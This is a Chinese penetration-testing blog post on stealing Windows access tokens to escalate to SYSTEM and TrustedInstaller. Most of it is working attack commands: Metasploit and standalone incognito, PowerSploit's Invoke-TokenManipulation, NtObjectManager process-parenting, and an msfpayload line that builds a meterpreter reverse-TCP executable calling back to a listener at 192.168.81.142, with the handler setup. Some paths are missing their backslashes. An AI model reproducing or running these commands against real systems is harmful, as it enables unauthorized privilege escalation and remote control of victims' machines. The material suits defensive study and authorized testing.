内网渗透----Token 窃取与利用

0x00 前言

在之前的文章《渗透技巧——程序的降权启动》介绍了使用 SelectMyParent 降权的方法,本质上是通过 token 窃取实现的。这一次将要对 token 窃取和利用做进一步介绍,测试常用工具,分享利用技巧。

0x01 简介

本文将要介绍以下内容 ;

· Token 简介
· Metasploit 中的 incognito
· Windows 平台下的 incognito
· Invoke-TokenManipulation.ps1 用法
· 利用 token 获得 system 权限
· 利用 token 获得 TrustedInstaller 权限

0x02 Token 简介

Windows 有两种类型的 Token:
  • Delegation token ( 授权令牌 ) : 用于交互会话登录 ( 例如本地用户直接登录、远程桌面登录 )

  • Impersonation token ( 模拟令牌 ) : 用于非交互登录 ( 利用 net use 访问共享文件夹 )

  • 注:

    • 两种 token 只在系统重启后清除

    • 具有 Delegation token 的用户在注销后,该 Token 将变成 Impersonation token,依旧有效

实际测试

使用 Testa 登录后注销,再使用 administrator 登录
查看 token:

incognito.exe   list_tokens   -u

能够获取到已注销用户 Testa 的 token,如下图

在这里插入图片描述
利用该 token 执行 calc.exe:

incognito.exe   execute   -c   "TESTa"   calc.exe

后台显示进程 calc.exe 的用户名为 a,如下图
在这里插入图片描述

0x03 Metasploit 中的 incognito

在 Metasploit 中,可使用 incognito 实现 token 窃取,常用命令如下:

加载 incognito:load incognito
列举 token:list_tokens -u
查看当前 token:getuid
提示至 system 权限:getsystem
token 窃取:impersonate_token "NT AUTHORITY\SYSTEM"
从进程窃取:steal_token 1252
返回之前 token:rev2self or drop_token

Client:

msfpayload   -p   windows/meterpreter/reverse_tcp   LHOST=192.168.81.142   LPORT=44444   X  >test.exe

Server:

use   exploit/multi/handler set   payload   windows/meterpreter/reverse_tcp 
set   LPORT   44444 
set   LHOST   192.168.81.142 
exploit

执行 getsystem 获得 system 权限
pid 1252 的权限为当前用户,执行 steal_token 1252, 将权限切换到 WIN-R7MM90ERBMDa
如下图
在这里插入图片描述

执行 impersonate_token “NT AUTHORITY\SYSTEM” 将权限切换至 system
注:

需要加引号和双斜杠,"NT AUTHORITY\SYSTEM"
执行 rev2self 返回之前 token,为 WIN-R7MM90ERBMDa

如下图

在这里插入图片描述
通过以上演示,成功通过 token 窃取实现权限切换

0x04 Windows 平台下的 incognito

Metasploit 中的 incognito,是从 windows 平台下的 incognito 移植过来的,下面介绍一下 windows 平台下的 incognito
下载地址:

https://labs.mwrinfosecurity.com/assets/BlogFiles/incognito2.zip

参考手册:

http://labs.mwrinfosecurity.com/assets/142/mwri_security-implications-of-windows-access-tokens_2008-04-14.pdf

常见用法如下:

列举 token:incognito.exe list_tokens -u
复制 token:incognito.exe execute [ options ] 
列举 token:incognito.exe   list_tokens   -u

如下图

在这里插入图片描述
提权至 system:

incognito.exe   execute   -c   "NT   AUTHORITYSYSTEM"   cmd.exe

如下图

在这里插入图片描述
降权至当前用户:

incognito.exe   execute   -c   "WIN-R7MM90ERBMDa"   cmd.exe

伪造用户:

incognito.exe   execute   -c   "WIN-R7MM90ERBMDb"   cmd.exe

在这里插入图片描述

0x05 Invoke-TokenManipulation.ps1 用法

下载地址:
https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-TokenManipulation.ps1
原理和功能同 incognito 类似,能够实际提权和降权

列举 token:Invoke-TokenManipulation -Enumerate
提权至 system:Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "nt authoritysystem"
复制进程 token:Invoke-TokenManipulation -CreateProcess "cmd.exe" -ProcessId 500
复制线程 token:Invoke-TokenManipulation -CreateProcess "cmd.exe" -ThreadId 500

还有更多用法可参考该脚本说明
实际测试略

0x06 利用 token 获得 TrustedInstaller 权限

在 Windows 系统中,即使获得了管理员权限和 system 权限,也不能修改系统文件
因为 Windows 系统的最高权限为 TrustedInstaller
例如路径 C:Windowsservicing
使用 system 权限无法在该路径创建文件
在这里插入图片描述

查看文件夹属性,显示 system 不具有写入权限,只有 TrustedInstaller 可以
在这里插入图片描述

关于如何获得 TrustedInstaller 权限,可参考 James Forshaw 的这篇文章,很值得学习
https://tyranidslair.blogspot.nl/2017/08/the-art-of-becoming-trustedinstaller.html
这里对其中的一个实例做测试,进而找到其他实现方法

启动 TrustedInstaller 服务会启动进程 TrustedInstaller.exe,位置为 C:WindowsservicingTrustedInstaller.exe,查看该程序权限:

Get-Acl   -Path   C:\Windows\servicing\TrustedInstaller.exe   |select   Owner

显示为 NT SERVICE\TrustedInstaller,如下图

在这里插入图片描述
James Forshaw 的实现思路为借用 TrustedInstaller.exe 的 token 创建子进程,这样子进程就有了 TrustedInstaller 权限,具体 powershell 代码如下:

Set-NtTokenPrivilege   SeDebugPrivilege $p   =   Get-NtProcess   -Name   TrustedInstaller.exe $proc   =   New-Win32Process   cmd.exe   -CreationFlags   NewConsole   -ParentProcess   $p

powershell 默认不支持 Set-NtTokenPrivilege 命令,该模块需要下载安装
https://www.powershellgallery.com/packages/NtObjectManager/1.1.1
安装命令:

Save-Module   -Name   NtObjectManager   -Path   c:test Install-Module   -Name   NtObjectManager

注:
Save-Module 需要 powershell v5.0 支持,详情见:
https://docs.microsoft.com/zh-cn/powershell/gallery/readme
因此测试系统选为 Win10,默认 powershell 版本为 5.0
导入该模块需要系统允许执行 powershell 脚本,因此先执行如下代码:

Set-ExecutionPolicy   Unrestricted

导入模块 NtObjectManager:

Import-Module   NtObjectManager.

执行命令测试:

sc.exe   start   TrustedInstaller 
Set-NtTokenPrivilege   SeDebugPrivilege
$p   =   Get-NtProcess   -Name   TrustedInstaller.exe 
$proc   =   New-Win32Process   cmd.exe   -CreationFlags   NewConsole   -ParentProcess   $p

使用 whoami 查看当前 cmd 权限:

whoami   /groups   /fo   list

发现当前 cmd.exe 在 TrustedInstaller 组里,成功获得 TrustedInstaller 权限
在这里插入图片描述

接着按照 James Forshaw 文章中更新的内容,学习了 Vincent Yiu@vysecurity 的方法,使用 metasploit 下的 incognito 也能够获得 TrustedInstaller 权限
地址如下:
https://twitter.com/vysecurity/status/899303538630774787
思路如下:

· 启动服务 TrustedInstaller
· 使用 incognito 获取 TrustedInstaller.exe 的 token
· 获得 TrustedInstaller 权限

使用以下命令:

· load incognito
· getsytem
· ps
· steal_token 3204
· getuid

按照这个思路,猜测使用 SelectMyParent 和 Invoke-TokenManipulation.ps1 也能获得 TrustedInstaller 权限
下面验证我们的判断
1、SelectMyParent

sc   start   TrustedInstaller SelectMyParent.exe   cmd.exe   1700

新的 cmd.exe 拥有 TrustedInstaller 权限
2、Invoke-TokenManipulation.ps1
添加如下代码即可:

sc.exe   start   TrustedInstaller $id    =   Get-Process   -name   TrustedInstaller*   |   Select-Object   id   |   ForEach-Object   -Process{$_.id} Invoke-TokenManipulation   -CreateProcess   "cmd.exe"   -ProcessId   $id

sc 这个命令不能直接在 powershell 里面运行,powershell 会把它当作 set-content 的别名,可使用 sc.exe 在 powershell 里面运行 sc 命令

验证是否获得 TrustedInstaller 权限的方法

1、对特殊路径写文件
例如 C:Windowsservicing
2、使用 powershell

Get-Acl   -Path   C:WindowsservicingTrustedInstaller.exe   |select   Owner

回显为 NT SERVICETrustedInstaller
3、使用 whoami

whoami   /groups   |   findstr   TrustedInstaller

查看是否有回显

0x07 小结

本文介绍了 token 窃取的实现方法,使用多种工具来获得 system 权限和 TrustedInstaller 权限。

  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值